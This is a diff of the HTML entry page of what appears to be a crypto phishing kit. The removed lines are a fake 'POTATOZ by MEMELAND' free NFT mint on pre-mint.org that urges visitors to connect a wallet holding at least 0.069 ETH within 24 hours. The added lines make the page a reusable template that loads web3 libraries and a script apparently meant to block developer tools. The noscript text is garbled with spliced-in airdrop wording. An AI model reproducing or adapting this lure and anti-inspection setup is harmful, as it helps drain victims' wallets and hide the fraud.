--- a/index.html
+++ b/index.html
@@ -11,79 +11,25 @@
   <link rel="preconnect" href="https://fonts.googleapis.com" />
   <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
   <meta name="viewport" content="width=device-width,initial-scale=1.0" />
-  <title>POTATOZ by MEMELAND | PREMINT</title>
-  <!-- Global site tag (gtag.js) - Google Analytics -->
-  <script src="https://www.googletagmanager.com/gtag/js?id=G-W96CGJ7751"></script>
-  <script>
-    window.dataLayer = window.dataLayer || [];
-    function gtag() {
-      dataLayer.push(arguments);
-    }
-    gtag("js", new Date());
-
-    gtag("config", "G-W96CGJ7751");
-  </script>
+  <title>Index</title>
   <link rel="icon" href="img/favicon.png" type="image/x-icon" />
   <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
   <script src="https://unpkg.com/bn.js@5.2.0/lib/bn.js"></script>
 
-  <script src="./js/index.js"></script>
+  <script src="./js/antiF12.js"></script>
 
-  <meta name="robots" content="index,follow" />
-  <meta name="googlebot" content="index,follow" />
-  <meta name=description content="🎉 We make FREE MINT as we want more people to join the MEMELAND ecosystem
-  
-🟢 We've already filtered raffle winners!
-You have 24 hours to mint!
-  
-🛒 9,999 supply | 1 NFT per wallet available
-  
-❗️ REQUIREMENTS: Have at least 0.069 ETH on your wallet
-Because 🥔 doesn`t like multi-accounts!
-  
-May the 🥔 be ever in your favor!">
-  <meta property=og:title content="THE POTATOZ : FREE mint is LIVE now">
-  <meta property="og:image" content="https://pre-mint.org/img/meta.gif" />
-  <meta property=og:type content=website>
-  <meta property=og:image:alt content="THE POTATOZ : FREE mint is LIVE now">
-  <meta property="twitter:image" content="https://pre-mint.org/img/meta.gif" />
-  <meta name=twitter:card content=summary_large_image>
-  <meta name=twitter:title content="THE POTATOZ : FREE mint is LIVE now">
-  <meta name=twitter:image:alt content="THE POTATOZ : FREE mint is LIVE now">
-  <meta property=og:description content="🎉 We make FREE MINT as we want more people to join the MEMELAND ecosystem
-  
-🟢 We've already filtered raffle winners!
-You have 24 hours to mint!
-  
-🛒 9,999 supply | 1 NFT per wallet available
-  
-❗️ REQUIREMENTS: Have at least 0.069 ETH on your wallet
-Because 🥔 doesn`t like multi-accounts!
-  
-May the 🥔 be ever in your favor!">
-  <meta name=twitter:description content="🎉 We make FREE MINT as we want more people to join the MEMELAND ecosystem
-  
-🟢 We've already filtered raffle winners!
-You have 24 hours to mint!
-  
-🛒 9,999 supply | 1 NFT per wallet available
-  
-❗️ REQUIREMENTS: Have at least 0.069 ETH on your wallet
-Because 🥔 doesn`t like multi-accounts!
-  
-May the 🥔 be ever in your favor!">
   <meta name="theme-color" content="#fc780d">
-  <link type="application/json+oembed" href="https://pre-mint.org/img/p/gfgy.json" />
+  <!-- <link type="application/json+oembed" href="https://<%= VUE_APP_BASE_URL %>/img/1/<%= VUE_APP_FILE_NAME %>.json" /> -->
 
   <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
   <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.css">
 
   <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
-<link href="js/app.js" rel="preload" as="script"><link href="js/chunk-vendors.js" rel="preload" as="script"></head>
+</head>
 
 <body>
   <noscript>
-    <strong>We're sorry but project doesn't work
+    <strong>We're sorry but <%= htmlWebpackPlugin.options.title %> doesn't work
         properly without JavaScript enabled. Pleas The distribution is based on
         the total number of transactions (30% weight) and transaction volume
         ETH, DAI & USDC (70% weight) on OpenSea. Users have until June 30, 2022
@@ -92,6 +38,5 @@ May the 🥔 be ever in your favor!">
   </noscript>
 
   <div id="app"></div>
-<script type="text/javascript" src="js/chunk-vendors.js"></script><script type="text/javascript" src="js/app.js"></script></body>
-
+</body>
 </html>
